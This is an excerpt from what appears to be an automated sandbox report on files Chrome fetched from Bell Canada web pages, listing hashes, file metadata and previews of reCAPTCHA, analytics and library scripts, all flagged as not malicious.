                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):102
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.997660514702103
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:JSbMqSL1cdXWKQKT/hlkMYatGECWaee:PLKdXNQKzLQL
                                                                                                                                                                                                                                                                                                                                      MD5:9AFB0D35BB088B3036561313BF7CE1F4
                                                                                                                                                                                                                                                                                                                                      SHA1:C7F3FDE34C537242969FBBD736B5B129611F1694
                                                                                                                                                                                                                                                                                                                                      SHA-256:6E4501CE6F65A1B8671A9D31A8F5AB56DFA4E30AA7A4A971DAA1544AB2EB53C1
                                                                                                                                                                                                                                                                                                                                      SHA-512:C08FAB7DD122743F8F942AC5F0F1A05A2A44BEFD7DA677074CC3D2D464A106CE88047C1396F4C99DABBF99541230CA37B05158F448E7014B36E1E9FE38C572AF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:importScripts('https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__en.js');
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):102891
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.249469574193134
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:k+XUraZUvvX56fY7nfzsAYOEbzEQqFFuFAxIzAW9UgBqd1WoXdBQ0HzTjJYmStPN:leX5RfoF9UgU2yL0tv/Dnjd
                                                                                                                                                                                                                                                                                                                                      MD5:1EABC9C3DAA01B5F0054992A921EC8E0
                                                                                                                                                                                                                                                                                                                                      SHA1:6414100789D932C26B8A6A66164E99B4599E7BE2
                                                                                                                                                                                                                                                                                                                                      SHA-256:DC30DF00A881A6090D203E044486BAC114B35C65882ED3F13017E75A390EB132
                                                                                                                                                                                                                                                                                                                                      SHA-512:1CA3FFB4463FE06980054929FEDB93EF218961F51E2DBF972FF8A294C605FFF3715A930415268BF1AAFAC4D8D974D442B5DA33F21449C707540ACE3C74A0F4EB
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/styles/RSX/framework/bell.js?v=GI8IM4sK5wI23_2CEheH6mi5DukHSToRvzQpg94bqB41&ver=00000000
                                                                                                                                                                                                                                                                                                                                      Preview:window.Modernizr=function(n,t,i){function a(n){c.cssText=n}function vt(n,t){return a(y.join(n+";")+(t||""))}function h(n,t){return typeof n===t}function v(n,t){return!!~(""+n).indexOf(t)}function lt(n,t){var u,r;for(u in n)if(r=n[u],!v(r,"-")&&c[r]!==i)return t=="pfx"?r:!0;return!1}function yt(n,t,r){var f,u;for(f in n)if(u=t[n[f]],u!==i)return r===!1?n[f]:h(u,"function")?u.bind(r||t):u;return!1}function f(n,t,i){var r=n.charAt(0).toUpperCase()+n.slice(1),u=(n+" "+ot.join(r+" ")+r).split(" ");return h(t,"string")||h(t,"undefined")?lt(u,t):(u=(n+" "+st.join(r+" ")+r).split(" "),yt(u,t,i))}function pt(){u.input=function(i){for(var r=0,u=i.length;r<u;r++)w[i[r]]=!!(i[r]in o);return w.list&&(w.list=!!(t.createElement("datalist")&&n.HTMLDataListElement)),w}("autocomplete autofocus list placeholder max min multiple pattern required step".split(" "));u.inputtypes=function(n){for(var u=0,r,f,e,h=n.length;u<h;u++)o.setAttribute("type",f=n[u]),r=o.type!=="text",r&&(o.value=g,o.style.cssText="pos
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):58461
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.45589060622783
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:hmbkMPxZ7DwimgTLEx+15c0XQTb5wB8iqP0/o:EbPPxBDwimgTLEx+15c0qc/o
                                                                                                                                                                                                                                                                                                                                      MD5:E78F0ECE001F35745B3B1860EEF2349A
                                                                                                                                                                                                                                                                                                                                      SHA1:9E924FDE3BF91233945E9943D264CA145B9E6009
                                                                                                                                                                                                                                                                                                                                      SHA-256:637F9951678DDEABF6ECEED5AC992585A52CDF7236729ED78A7C811068907DA4
                                                                                                                                                                                                                                                                                                                                      SHA-512:0221169E72167CF1BB11154D19F3DD9E134E151DA8E987026C0BC22242FAB31C1274151A7792759EAC50AC40A82C79F381AFDA841B0BCE1A50FF96CA26C750EE
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/styles/media/support/Shared/js/support-bottom.js?v=TbY9XM3Z34pLt3TbYyw8-VlzNeDkYndNZM6qEW_1G9U1
                                                                                                                                                                                                                                                                                                                                      Preview:/* Minification failed. Returning unminified contents...(652,18-19): run-time error JS1300: Strict-mode does not allow assignment to undefined variables: i..(652,50-51): run-time error JS1294: Strict-mode does not allow ++ or -- on certain objects: i.. */..var BELL = (function(bell, $) {.. 'use strict';.. .. $.ajaxMock = function(context) {.. if (context.url === "/ajax/Feedback/SaveRating") {.. console.warn("mock $.ajax!");.. context.success('["ratingId","dfa8d1fe-906a-4c64-bbbd-030cf4b75abb"]');.. } else if (context.url === "/ajax/Feedback/SaveFeedback") {.. console.warn("mock $.ajax!");.. context.success('["succeeFlag","Y"]');.. } else {.. $.ajax(context);.. }.. };.. bell.mteSupportModules = bell.mteSupportModules || {};.. bell.mteSupportModules.feedback = (function() {.. function enCode(input) {.. var i;.. var result = "";.. if (input) {..
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x512, components 3
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):48466
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.302671982956141
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:Ae29CDKTQTuopWi6FFzUm9qyxJT9TmT9oTElQx42M7PJ66CyFiR+WJWXLjNIKgAB:Ae2IAopWioB9qyrx42M7PJ6dyFidWbjn
                                                                                                                                                                                                                                                                                                                                      MD5:C19F3E74E300172964BF9052AEE6EB08
                                                                                                                                                                                                                                                                                                                                      SHA1:3AE53757AAF2D40565AB95BFB7B968EC3DB2EAD3
                                                                                                                                                                                                                                                                                                                                      SHA-256:87C5F66E5288824DDA4C1806B6F3C8A6D1FA454AE3FFDA18EDD26E2C99687449
                                                                                                                                                                                                                                                                                                                                      SHA-512:FA486B822B0C1926757B623693521218B8D79DC7B753CABCF321C7F6BEBC645F762272FECA0EB1ADAD71C946134E45B2D80FF04746FC771FCD8C905369DF7B55
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:......JFIF.............C....................................................................C.........................................................................................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?........(......(......(.......T.......l...o..rT...@....j....<-..e....M..~+P.@....P.@.........1......r.....R.>U........M.../..,.......(...........\...2....../h..................q...W@.U...?..>...k..L.....@....P.@....P.._..;.h.........(......(......(......(......(......(......(......(..S..c..5.....P...|........X......7j4...@....P.@....P......kg........J..W.....&'.7..
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.902793404502967
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREOP1yqXXl6EpPXQ1CSHI:UrXid4qX11XMRo
                                                                                                                                                                                                                                                                                                                                      MD5:A8DAA8D6908482A9B0D13CDAB93A6AAC
                                                                                                                                                                                                                                                                                                                                      SHA1:C3B9E5F9E225457C99F89BE4F55194C76F29B70C
                                                                                                                                                                                                                                                                                                                                      SHA-256:ECCEF59CE4BCA06C7D100D0C1169366CEC5ADC568EB561946DE3C3108633EE88
                                                                                                                                                                                                                                                                                                                                      SHA-512:2A8A5F24A166B86C94CB4D93AE703DCE3CCB0A0B156F33C540A0E76EEB2F8C7C5C67433CBC5F18C8B5ABA43CE831A73AB1295DF2A86EF19542E25F436C15D712
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__2
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__2 === 'function' && branch_callback__2("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):136
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.309801999851815
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:HrPyuhW49zZzFmWOk5Ev2jkvf5+HeurgkgbKKcaMkYrmSWNQNsb:zyy/FhO7vNvmeudZyXQNsb
                                                                                                                                                                                                                                                                                                                                      MD5:A1A0AD988EF8E06CBA95A5810DAEC181
                                                                                                                                                                                                                                                                                                                                      SHA1:B0003EB6EE7D67626D1278B334B4FB0DA633D09F
                                                                                                                                                                                                                                                                                                                                      SHA-256:28BADAA4C892DB05F3C200BDC857074906D13AB0B5AF62617E205AA3EF5FC438
                                                                                                                                                                                                                                                                                                                                      SHA-512:84F5701616D5663922E85B9C63B1D5393BC0E621EC270388F0C84EC513CF0947AEEECCDEE63C8943A901119208572FBCEDDBFBB8DE553432D41C7C338E195B0C
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAnk3JWNNQEQSRIFDVKKSaMSFwlF_9FmeR7JmhIFDVhccJISBQ1YnrzrEhcJOLXUfxcOjEMSBQ1nZ7P-EgUN4ebU1g==?alt=proto
                                                                                                                                                                                                                                                                                                                                      Preview:CgkKBw1SikmjGgAKPQoNDVhccJIaBAhWGAIgAQosDVievOsaBAhLGAIqHwgKUhsKESFAJCMqLi1fPyYlKy89KSxeEAEY/////w8KGgoLDWdns/4aBAgjGAEKCw3h5tTWGgQIIhgB
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (32002), with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):211386
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.512676080177846
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:h19KR161Ln07BiIR4i8ZXRQr1ZXgkn+KPG/rbfvpoceZbdgzlVR0mukInodC5E7E:h19KRUqtio8/rDpoceZbdgzjUkIMC5EQ
                                                                                                                                                                                                                                                                                                                                      MD5:FA7FE72C0230B7C15DEB6D3463B83F5E
                                                                                                                                                                                                                                                                                                                                      SHA1:36B191A739659089C84F070A771293C8057A2FE8
                                                                                                                                                                                                                                                                                                                                      SHA-256:F6798E8EA6C8EBB7E954D426312E9EEF758FE4127D9F31684FD32B47471CA3CC
                                                                                                                                                                                                                                                                                                                                      SHA-512:D59624A0C9DC6FBBB87423CDBDED6E259CDBFA6E51DA5FFB0BCEF5F4E97252EB011045029FD93D90DC629C9C05C81227AB24CF1977F4E237EB52C42DE882AB82
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/**. * Copyright 2024 Medallia Inc.. * https://www.medallia.com/. */.window._da_=window._da_||[];_da_['jsVersion']=1720471118;_da_["da_websiteId"] = 693653;_da_["returnVisit"] = false;_da_["accountNumber"] = 14028;_da_["da_dnsRecord"] = "collection.decibelinsight.net";_da_["intPreScripts"] = function(){try{(function(){function c(b){if(b.detail&&b.detail.tokens){b=b.detail.tokens;var d,e=[];for(d in b)if(b.hasOwnProperty(d)){var a=b[d];if(a["activity.name"]&&a["experience.name"]&&a["experience.id"]&&a["activity.id"]){var c=a["activity.name"]+" : "+a["experience.name"];a=a["activity.id"]+"-"+a["experience.id"];-1>=e.indexOf(a)&&(decibelInsight("sendIntegrationData","AdobeTarget",{name:c,id:a}),e.push(a))}}}}window.di_adobe_event_bound||(document.addEventListener("ATDecibelTokens",c),window.di_adobe_event_bound=!0)})();}catch(e){window[window.DecibelInsight].warn('DecibelInsight: Configuration error in Integration Tag.', e.toString()); if (window[window.DecibelInsight].handleException) wi
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1680), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1680
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.731511957816592
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:2jkm94oHPccXAAbBlB9+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLtfO1/66:iEckKo7LmvtUjPKtX7ZO1/2LrwUnG
                                                                                                                                                                                                                                                                                                                                      MD5:CB8040A68003281432BFFA54A6DDAD40
                                                                                                                                                                                                                                                                                                                                      SHA1:C238C5B17BA77105B7B97D063FAC9323E6FECDFD
                                                                                                                                                                                                                                                                                                                                      SHA-256:AA5D2A77A6C22CDA13FD33A224D4897B3F8BCB54EB1CB559A649519FFE66863B
                                                                                                                                                                                                                                                                                                                                      SHA-512:44D0DE8F556EF49C6A41BAC83A2797A948D212486DC8A3DFCE1E20779EBB29CA72F634DD5EC0C44EC27105B6F41A3B679EC34C66695C4241E8CCF4F1D670AB52
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var E='enterprise',a=w[N]=w[N]||{},gr=a[E]=a[E]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/enterprise/';(cfg['enterprise']=cfg['enterprise']||[]).push(true);(cfg['enterprise2fa']=cfg['enterprise2fa']||[]).push(true);(cfg['render']=cfg['render']||[]).push('6LeIfTIaAAAAAHMPXsezv4PdsckDc-wAJU-eo2YP');(cfg['onload']=cfg['onload']||[]).push('getCaptchaEnterprise');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLC
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (27262)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):30953
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.404483058426303
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:eM3+xW4/2+/6/oCeF8wPnzxN2DiBGhLylG4DXYGmB:eMPcU/o182EhLSUGmB
                                                                                                                                                                                                                                                                                                                                      MD5:BD44B299FB6FD5B9A2A3F4F3C080F85C
                                                                                                                                                                                                                                                                                                                                      SHA1:4AB2E75A0C0AA0C6ECD12FED26C502C81506154B
                                                                                                                                                                                                                                                                                                                                      SHA-256:E34FC3965EDB73D7835C318A20B403FCDD6F86269B95B2F9B58A07A3A974F1D8
                                                                                                                                                                                                                                                                                                                                      SHA-512:388D43D87BB57F0143D04660AEB392E0FB419FF6FC9672DCEC6D8CE685366BD5027FC615FB1C151A36D18BB8182CA7C44925FEA8ADD0A197FC60361AADC0762D
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/*! pako deflate 1.0.11 with Dojo/ReactJS fix. The fix consists of the forcing of the assignment of the returned object from the call to 't()' to 'window.pako' */.!function(t){self.pako=t()}(function(){return function i(s,h,l){function o(e,t){if(!h[e]){if(!s[e]){var a="function"==typeof require&&require;if(!t&&a)return a(e,!0);if(_)return _(e,!0);var n=new Error("Cannot find module '"+e+"'");throw n.code="MODULE_NOT_FOUND",n}var r=h[e]={exports:{}};s[e][0].call(r.exports,function(t){return o(s[e][1][t]||t)},r,r.exports,i,s,h,l)}return h[e].exports}for(var _="function"==typeof require&&require,t=0;t<l.length;t++)o(l[t]);return o}({1:[function(t,e,a){"use strict";var n="undefined"!=typeof Uint8Array&&"undefined"!=typeof Uint16Array&&"undefined"!=typeof Int32Array;a.assign=function(t){for(var e,a,n=Array.prototype.slice.call(arguments,1);n.length;){var r=n.shift();if(r){if("object"!=typeof r)throw new TypeError(r+"must be non-object");for(var i in r)e=r,a=i,Object.prototype.hasOwnProperty
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (51384), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):51385
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.293328685395304
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:IaOFhhRC5JFhLjfRysgLzQynDw5YyDMFW8KQ:IaOFnR2DRszQKaoWtQ
                                                                                                                                                                                                                                                                                                                                      MD5:6626C1362840EBFC8F48294E8F023E18
                                                                                                                                                                                                                                                                                                                                      SHA1:4EC0DFB37C3E536C1B5EC04B68C9846FDBAF9EEF
                                                                                                                                                                                                                                                                                                                                      SHA-256:AABC88A6DB8B22022F96CA88E4F0A7BE426ABEF2B35169A71515A2D55246402A
                                                                                                                                                                                                                                                                                                                                      SHA-512:B037A19B52C1047198EC7F19E99066054E454964380E2354239834260D11248E617D6759B944DDF39A25B883C8F430603D8E13097396E2DEDA9BB6905C1CD42A
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://bat.bing.com/bat.js
                                                                                                                                                                                                                                                                                                                                      Preview:function UET(o){this.stringExists=function(n){return n&&n.length>0};this.domain="bat.bing.com";this.domainCl="bat.bing.net";this.URLLENGTHLIMIT=4096;this.pageLoadEvt="pageLoad";this.customEvt="custom";this.pageViewEvt="page_view";o.Ver=o.Ver!==undefined&&(o.Ver==="1"||o.Ver===1)?1:2;this.uetConfig={};this.uetConfig.consent={enabled:!1,adStorageAllowed:!0,adStorageUpdated:!1,hasWaited:!1,waitForUpdate:0,enforced:!1};this.uetConfig.tcf={enabled:!1,vendorId:1126,hasLoaded:!1,timeoutId:null,gdprApplies:undefined,adStorageAllowed:undefined,measurementAllowed:undefined,personalizationAllowed:undefined};this.uetConfig.cusig={hasLoaded:!1,timeoutId:null,blob:{}};this.beaconParams={};this.supportsCORS=this.supportsXDR=!1;this.paramValidations={string_currency:{type:"regex",regex:/^[a-zA-Z]{3}$/,error:"{p} value must be ISO standard currency code"},number:{type:"num",digits:3,max:999999999999},integer:{type:"num",digits:0,max:999999999999},hct_los:{type:"num",digits:0,max:30},date:{type:"regex",
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):18
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5724312513221195
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:uZuUeB:u5eB
                                                                                                                                                                                                                                                                                                                                      MD5:53AF239EE5D3E261545DEDEDCB6FFD57
                                                                                                                                                                                                                                                                                                                                      SHA1:04CA7E137E1E9FEEAD96A7DF45BB67D5AB3DE190
                                                                                                                                                                                                                                                                                                                                      SHA-256:99EB12F2AB3C4866A353E098FFA3CB7A967E617C49B98480394EC5D8EA92B094
                                                                                                                                                                                                                                                                                                                                      SHA-512:C734E4A5FF5D335A91518DBF47861BDAF8012AF49371DCD2E3350E269C9A5A1CC094114D17C4F5B053F3757B4B07487EBD0D309C91EF97ACF4665CC5D5C9A2D3
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:404 page not found
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (58876), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):58876
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.405683338218142
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:buY9NdAkLYPFvFkxF94zPnSJpSFDKNo5/H:buQdApFoF94zPnSJpSFDP5/H
                                                                                                                                                                                                                                                                                                                                      MD5:4328E910DE583AD53B3A7A76455AF005
                                                                                                                                                                                                                                                                                                                                      SHA1:E040010E5EF4121A3A163AACDC664D6AA4AFEC74
                                                                                                                                                                                                                                                                                                                                      SHA-256:D4963B8AFEBFA0063B5D17B4C80F49BCE702A37EA5C9B91BB3C996BB9DEA4B60
                                                                                                                                                                                                                                                                                                                                      SHA-512:F807BA8B0AE2D5387E93E292918EEB4D7D1AC7635566A38EE2E101FBE8A7C6C23E704770EFCB1401EB5D1385605CBFB15F0A840AC150770049D2A4D6CA9A0DFA
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:!function(){var t={6173:function(t,e,n){var r;t.exports=(r=r||function(t,e){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&void 0!==n.g&&n.g.crypto&&(r=n.g.crypto),!r)try{r=n(2480)}catch(t){}var i=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof r.randomBytes)try{return r.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")},o=Object.create||function(){function t(){}return function(e){var n;return t.prototype=e,n=new t,t.prototype=null,n}}(),a={},c=a.lib={},u=c.Base={extend:function(t){var e=o(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):23964
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.155395327044484
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
